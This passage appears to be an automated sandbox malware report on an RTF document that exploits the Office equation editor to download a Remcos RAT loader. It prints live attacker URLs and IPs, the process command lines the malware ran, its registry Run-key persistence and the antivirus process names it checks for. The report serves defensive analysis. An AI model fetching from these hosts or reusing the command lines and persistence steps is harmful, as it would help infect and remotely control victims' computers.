                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ahhbgzzQ.cmd" "Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Roaming\audiodg.exe /d C:\\Users\\Public\\Libraries\\Qzzgbhha.PIF /oJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /oJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
                  Source: audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: quhlpsvc.exe
                  Source: audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgamsvr.exe
                  Source: audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
                  Source: audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Vsserv.exe
                  Source: audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgupsvc.exe
                  Source: audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgemc.exe
                  Source: audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 5.2.audiodg.exe.2d20000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.402155278.000000007DB60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.400349163.0000000002DA7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: audiodg.exe PID: 3780, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 5.2.audiodg.exe.2d20000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.402155278.000000007DB60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.400349163.0000000002DA7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: audiodg.exe PID: 3780, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire Infrastructure1
                  Valid Accounts                  		1
                  Command and Scripting Interpreter                  		1
                  Valid Accounts                  		1
                  Valid Accounts                  		211
                  Masquerading                  		OS Credential Dumping1
                  Query Registry                  		Remote Services11
                  Archive Collected Data                  		11
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts33
                  Exploitation for Client Execution                  		1
                  Registry Run Keys / Startup Folder                  		1
                  Access Token Manipulation                  		1
                  Valid Accounts                  		LSASS Memory11
                  Security Software Discovery                  		Remote Desktop ProtocolData from Removable Media12
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt1
                  DLL Side-Loading                  		311
                  Process Injection                  		1
                  Disable or Modify Tools                  		Security Account Manager1
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin SharesData from Network Shared Drive2
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                  Registry Run Keys / Startup Folder                  		1
                  Modify Registry                  		NTDS1
                  Remote System Discovery                  		Distributed Component Object ModelInput Capture123
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                  DLL Side-Loading                  		1
                  Virtualization/Sandbox Evasion                  		LSA Secrets1
                  File and Directory Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Access Token Manipulation                  		Cached Domain Credentials13
                  System Information Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
                  Process Injection                  		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Deobfuscate/Decode Files or Information                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
                  Obfuscated Files or Information                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                  Install Root Certificate                  		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                  DLL Side-Loading                  		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1517947 Sample: K0hpP6V2fo.rtf Startdate: 25/09/2024 Architecture: WINDOWS Score: 100 63 Suricata IDS alerts for network traffic 2->63 65 Found malware configuration 2->65 67 Malicious sample detected (through community Yara rule) 2->67 69 20 other signatures 2->69 9 WINWORD.EXE 291 13 2->9         started        11 Qzzgbhha.PIF 2->11         started        process3 signatures4 14 EQNEDT32.EXE 12 9->14         started        19 EQNEDT32.EXE 9->19         started        85 Multi AV Scanner detection for dropped file 11->85 87 Early bird code injection technique detected 11->87 89 Machine Learning detection for dropped file 11->89 91 Allocates memory in foreign processes 11->91 21 SndVol.exe 11->21         started        process5 dnsIp6 57 107.175.243.142, 49163, 80 AS-COLOCROSSINGUS United States 14->57 51 C:\Users\user\AppData\Roaming\audiodg.exe, PE32 14->51 dropped 53 C:\Users\user\AppData\...\audiodg[1].exe, PE32 14->53 dropped 59 Office equation editor establishes network connection 14->59 61 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 14->61 23 audiodg.exe 1 6 14->23         started        file7 signatures8 process9 dnsIp10 55 maan2u.com 112.137.173.77, 443, 49164, 49165 TMVADS-APTM-VADSDCHostingMY Malaysia 23->55 45 C:\Users\Public\Qzzgbhha.url, MS 23->45 dropped 47 C:\Users\Public\Libraries\Qzzgbhha, data 23->47 dropped 77 Multi AV Scanner detection for dropped file 23->77 79 Early bird code injection technique detected 23->79 81 Installs new ROOT certificates 23->81 83 2 other signatures 23->83 28 cmd.exe 23->28         started        30 esentutl.exe 1 23->30         started        33 SndVol.exe 23->33         started        file11 signatures12 process13 file14 35 esentutl.exe 1 28->35         started        39 esentutl.exe 1 28->39         started        49 C:\Users\Public\Libraries\Qzzgbhha.PIF, PE32 30->49 dropped process15 file16 41 C:\Users\Public\alpha.pif, PE32 35->41 dropped 71 Drops PE files to the user root directory 35->71 73 Drops PE files with a suspicious file extension 35->73 75 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 35->75 43 C:\Users\Public\xpha.pif, PE32 39->43 dropped signatures17

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  K0hpP6V2fo.rtf47%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\audiodg.exe100%Joe Sandbox ML
                  C:\Users\Public\Libraries\Qzzgbhha.PIF100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\audiodg[1].exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\audiodg[1].exe32%ReversingLabs
                  C:\Users\user\AppData\Roaming\audiodg.exe32%ReversingLabs
                  C:\Users\Public\Libraries\Qzzgbhha.PIF32%ReversingLabs
                  C:\Users\Public\alpha.pif0%ReversingLabs
                  C:\Users\Public\xpha.pif0%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://sectigo.com/CPS00%URL Reputationsafe
                  http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
                  http://ocsp.sectigo.com00%URL Reputationsafe
                  http://geoplugin.net/json.gp/C0%URL Reputationsafe
                  http://ocsp.entrust.net030%URL Reputationsafe
                  http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
                  http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                  http://crl.entrust.net/server1.crl00%Avira URL Cloudsafe
                  http://107.175.243.142/340/audiodg.exe100%Avira URL Cloudmalware
                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%Avira URL Cloudsafe
                  http://107.175.243.142/340/audiodg.exej0%Avira URL Cloudsafe
                  http://107.175.243.142/340/audiodg.exellC:0%Avira URL Cloudsafe
                  http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl00%Avira URL Cloudsafe
                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%Avira URL Cloudsafe
                  http://www.diginotar.nl/cps/pkioverheid00%Avira URL Cloudsafe
                  http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#0%Avira URL Cloudsafe
                  https://maan2u.com/doc/233_QzzgbhhaamlKd0%Avira URL Cloudsafe
                  http://ocsp.entrust.net0D0%Avira URL Cloudsafe
                  http://www.pmail.com0%Avira URL Cloudsafe
                  https://maan2u.com/doc/233_Qzzgbhhaaml0%Avira URL Cloudsafe
                  http://ocsp.sectigo.com0C0%Avira URL Cloudsafe
                  https://secure.comodo.com/CPS00%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  maan2u.com
                  		112.137.173.77
                  		truetrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://107.175.243.142/340/audiodg.exetrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://maan2u.com/doc/233_Qzzgbhhaamltrue
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://107.175.243.142/340/audiodg.exejEQNEDT32.EXE, 00000002.00000002.380237258.00000000008DF000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://crl.pkioverheid.nl/DomOvLatestCRL.crl0audiodg.exe, 00000005.00000002.398958656.000000000074C000.00000004.00000001.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.398958656.0000000000756000.00000004.00000001.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.393192646.0000000000725000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://sectigo.com/CPS0audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://crl.entrust.net/server1.crl0audiodg.exe, 00000005.00000002.398958656.000000000074C000.00000004.00000001.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.393192646.0000000000725000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://ocsp.sectigo.com0audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://geoplugin.net/json.gp/Caudiodg.exe, 00000005.00000002.402155278.000000007DB60000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.400349163.0000000002DA7000.00000040.00001000.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://ocsp.entrust.net03audiodg.exe, 00000005.00000002.398958656.000000000074C000.00000004.00000001.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.393192646.0000000000725000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://107.175.243.142/340/audiodg.exellC:EQNEDT32.EXE, 00000002.00000002.380237258.00000000008DF000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0audiodg.exe, 00000005.00000003.393192646.0000000000725000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.diginotar.nl/cps/pkioverheid0audiodg.exe, 00000005.00000002.398958656.000000000074C000.00000004.00000001.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.398958656.0000000000756000.00000004.00000001.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.393192646.0000000000725000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://maan2u.com/doc/233_QzzgbhhaamlKdaudiodg.exe, 00000005.00000002.398958656.00000000006E5000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://ocsp.entrust.net0Daudiodg.exe, 00000005.00000003.393192646.0000000000725000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://secure.comodo.com/CPS0audiodg.exe, 00000005.00000002.398958656.000000000074C000.00000004.00000001.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.393192646.0000000000725000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.pmail.comaudiodg.exe, 00000005.00000002.400314447.0000000002D4E000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402737811.000000007ECE0000.00000004.00001000.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://crl.entrust.net/2048ca.crl0audiodg.exe, 00000005.00000003.393192646.0000000000725000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://ocsp.sectigo.com0Caudiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    107.175.243.142
                    		unknownUnited States
                    		36352AS-COLOCROSSINGUStrue
                    112.137.173.77
                    		maan2u.comMalaysia
                    		17971TMVADS-APTM-VADSDCHostingMYtrue

                    General Information

                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1517947
                    Start date and time:2024-09-25 09:42:22 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 56s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:22
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:K0hpP6V2fo.rtf
                    renamed because original name is a hash value
                    Original Sample Name:7a9a05109dd848058fd327bc38459a3d.rtf
                    Detection:MAL
                    Classification:mal100.troj.expl.evad.winRTF@19/18@3/2
                    EGA Information:
                    • Successful, ratio: 50%
                    HCA Information:
                    • Successful, ratio: 98%
                    • Number of executed functions: 7
                    • Number of non-executed functions: 4
                    Cookbook Comments:
                    • Found application associated with file extension: .rtf
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Active ActiveX Object
                    • Scroll down
                    • Close Viewer

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 104.208.16.93
                    • Excluded domains from analysis (whitelisted): onedsblobprdcus07.centralus.cloudapp.azure.com, watson.microsoft.com, legacywatson.trafficmanager.net
                    • Execution Graph export aborted for target EQNEDT32.EXE, PID 3620 because there are no executed function
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • VT rate limit hit for: K0hpP6V2fo.rtf

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    00:43:38AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Qzzgbhha C:\Users\Public\Qzzgbhha.url
                    00:43:47AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Qzzgbhha C:\Users\Public\Qzzgbhha.url
                    03:43:22API Interceptor315x Sleep call for process: EQNEDT32.EXE modified
                    03:43:27API Interceptor74x Sleep call for process: audiodg.exe modified
                    03:43:56API Interceptor7x Sleep call for process: Qzzgbhha.PIF modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    107.175.243.142Payment Slip.xlsGet hashmaliciousDBatLoader, RemcosBrowse
                    • 107.175.243.142/340/audiodg.exe
                    EORJy4JxW2.rtfGet hashmaliciousDBatLoader, RemcosBrowse
                    • 107.175.243.142/254/audiodg.exe
                    112.137.173.77XjPA2pnUhC.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                      Payment Slip.xlsGet hashmaliciousDBatLoader, RemcosBrowse
                        EORJy4JxW2.rtfGet hashmaliciousDBatLoader, RemcosBrowse
                          ZPujMIT7Vs.exeGet hashmaliciousRemcos, DBatLoaderBrowse

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            maan2u.comXjPA2pnUhC.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                            • 112.137.173.77
                            Payment Slip.xlsGet hashmaliciousDBatLoader, RemcosBrowse
                            • 112.137.173.77
                            EORJy4JxW2.rtfGet hashmaliciousDBatLoader, RemcosBrowse
                            • 112.137.173.77
                            ZPujMIT7Vs.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                            • 112.137.173.77

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            AS-COLOCROSSINGUSC8G355qROx.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                            • 107.175.113.252
                            RFQ-948563836483638563735435376354.xlsGet hashmaliciousRemcos, GuLoaderBrowse
                            • 107.173.4.16
                            xNfDl1NeaI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                            • 107.173.4.16
                            GFqY91CTOZ.htaGet hashmaliciousCobalt Strike, Remcos, GuLoaderBrowse
                            • 107.173.4.16
                            TT4729920DBO.xlsGet hashmaliciousRemcosBrowse
                            • 107.175.113.252
                            NEW ORDER.xlsGet hashmaliciousUnknownBrowse
                            • 107.172.148.197
                            NEW ORDER.xlsGet hashmaliciousUnknownBrowse
                            • 107.172.148.197
                            NEW ORDER.xlsGet hashmaliciousUnknownBrowse
                            • 107.172.148.197
                            Pedido de GmbH.xlsGet hashmaliciousSnake KeyloggerBrowse
                            • 172.245.123.6
                            SPEC.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                            • 192.210.150.29
                            TMVADS-APTM-VADSDCHostingMYXjPA2pnUhC.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                            • 112.137.173.77
                            Payment Slip.xlsGet hashmaliciousDBatLoader, RemcosBrowse
                            • 112.137.173.77
                            EORJy4JxW2.rtfGet hashmaliciousDBatLoader, RemcosBrowse
                            • 112.137.173.77
                            ZPujMIT7Vs.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                            • 112.137.173.77
                            arm6.elfGet hashmaliciousUnknownBrowse
                            • 202.75.62.110
                            SecuriteInfo.com.Trojan.AutoIt.1161.27360.18045.exeGet hashmaliciousVIP KeyloggerBrowse
                            • 202.75.41.110
                            M2Vf6ASl3g.elfGet hashmaliciousUnknownBrowse
                            • 202.75.62.171
                            fhSHwOyb33.elfGet hashmaliciousGafgyt, MiraiBrowse
                            • 202.75.62.139
                            sora.arm7.elfGet hashmaliciousMiraiBrowse
                            • 202.75.62.119
                            lB9ZXOQaP3.elfGet hashmaliciousMiraiBrowse
                            • 202.75.62.116

                            JA3 Fingerprints

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            05af1f5ca1b87cc9cc9b25185115607dAWS 1301241710.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
                            • 112.137.173.77
                            SPEC.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                            • 112.137.173.77
                            Payment Slip.xlsGet hashmaliciousDBatLoader, RemcosBrowse
                            • 112.137.173.77
                            US0914424A.xla.xlsxGet hashmaliciousRemcos, PureLog StealerBrowse
                            • 112.137.173.77
                            US091024A.xla.xlsxGet hashmaliciousRemcos, PureLog StealerBrowse
                            • 112.137.173.77
                            5qcJn1lfO5.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                            • 112.137.173.77
                            gwfe4fo1Sp.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                            • 112.137.173.77
                            BA4M310209H14956.docx.docGet hashmaliciousUnknownBrowse
                            • 112.137.173.77
                            14bnOjMV2N.docGet hashmaliciousUnknownBrowse
                            • 112.137.173.77
                            Ziraat Bankas#U0131 Swift Mesaj#U0131.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
                            • 112.137.173.77

                            Dropped Files

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\audiodg[1].exeXjPA2pnUhC.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                              Payment Slip.xlsGet hashmaliciousDBatLoader, RemcosBrowse
                                C:\Users\Public\Libraries\Qzzgbhha.PIFXjPA2pnUhC.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                  Payment Slip.xlsGet hashmaliciousDBatLoader, RemcosBrowse
                                    C:\Users\user\AppData\Roaming\audiodg.exeXjPA2pnUhC.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                      Payment Slip.xlsGet hashmaliciousDBatLoader, RemcosBrowse

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\audiodg[1].exe

                                        Download File
                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
